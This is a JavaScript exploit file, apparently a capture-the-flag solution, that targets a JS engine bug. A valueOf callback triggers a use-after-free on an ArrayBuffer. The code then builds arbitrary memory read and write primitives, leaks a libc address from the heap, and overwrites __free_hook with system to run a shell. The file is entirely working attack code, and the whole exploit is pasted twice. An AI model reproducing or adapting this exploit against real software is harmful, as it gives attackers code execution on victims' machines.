d4em0n/exploit.js

## exploit.js
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

(() => {

var pwn = new ArrayBuffer(0x48);
var pwn5 = new ArrayBuffer(0x48);
var pwn2 = new ArrayBuffer(0x420);
var cc = [];
b = [0,1,2];
cc = [];
pwn.valueOf = () => {
    b[0] = new Float64Array(pwn);
    pwn = 0;
};
pwn++;
pwn = 0;
const heap = ftoi(b[0][1])
cc.push(new Float64Array(pwn5));
cc.push(new Float64Array(pwn5));
console.log(ftoi(b[0][0]));
console.log(heap);
const read64 = (addr) => {
    b[0][7] = itof(addr);
    return ftoi(cc[1][0]);

}
const write64 = (addr, val) => {
    b[0][7] = itof(addr);
    cc[1][0] = itof(val);
}

i = 0;
pwn2 = 0;
var libc_addr = 0;
var tmp = 0;
var tmp2 = 0;
for(let i=0;i<0x100000;i++) {
    libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))&BigInt(0xfff000000000)
    if(libc_addr == 0x7ff000000000) {
        libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))
        tmp = read64(BigInt(heap)+BigInt(i+1)*BigInt(8))
        tmp2 = read64(BigInt(heap)+BigInt(i-1)*BigInt(8))
        if(libc_addr == tmp && tmp2 < 0x500) {
            break;
        }
    }
}
console.log(libc_addr)
cc[0][0] = itof(BigInt(26739)) // sh
write64(BigInt(libc_addr)+BigInt(12104), BigInt(libc_addr)-BigInt(1664976)) // free_hook = system
cc[0] = 0

})();
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val) {
	f64_buf[0] = val;
	return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	}

	function itof(val) {
	u64_buf[0] = Number(val & 0xffffffffn);
	u64_buf[1] = Number(val >> 32n);
	return f64_buf[0];
	}

	(() => {

	var pwn = new ArrayBuffer(0x48);
	var pwn5 = new ArrayBuffer(0x48);
	var pwn2 = new ArrayBuffer(0x420);
	var cc = [];
	b = [0,1,2];
	cc = [];
	pwn.valueOf = () => {
	b[0] = new Float64Array(pwn);
	pwn = 0;
	};
	pwn++;
	pwn = 0;
	const heap = ftoi(b[0][1])
	cc.push(new Float64Array(pwn5));
	cc.push(new Float64Array(pwn5));
	console.log(ftoi(b[0][0]));
	console.log(heap);
	const read64 = (addr) => {
	b[0][7] = itof(addr);
	return ftoi(cc[1][0]);

	}
	const write64 = (addr, val) => {
	b[0][7] = itof(addr);
	cc[1][0] = itof(val);
	}

	i = 0;
	pwn2 = 0;
	var libc_addr = 0;
	var tmp = 0;
	var tmp2 = 0;
	for(let i=0;i<0x100000;i++) {
	libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))&BigInt(0xfff000000000)
	if(libc_addr == 0x7ff000000000) {
	libc_addr = read64(BigInt(heap)+BigInt(i)*BigInt(8))
	tmp = read64(BigInt(heap)+BigInt(i+1)*BigInt(8))
	tmp2 = read64(BigInt(heap)+BigInt(i-1)*BigInt(8))
	if(libc_addr == tmp && tmp2 < 0x500) {
	break;
	}
	}
	}
	console.log(libc_addr)
	cc[0][0] = itof(BigInt(26739)) // sh
	write64(BigInt(libc_addr)+BigInt(12104), BigInt(libc_addr)-BigInt(1664976)) // free_hook = system
	cc[0] = 0

	})();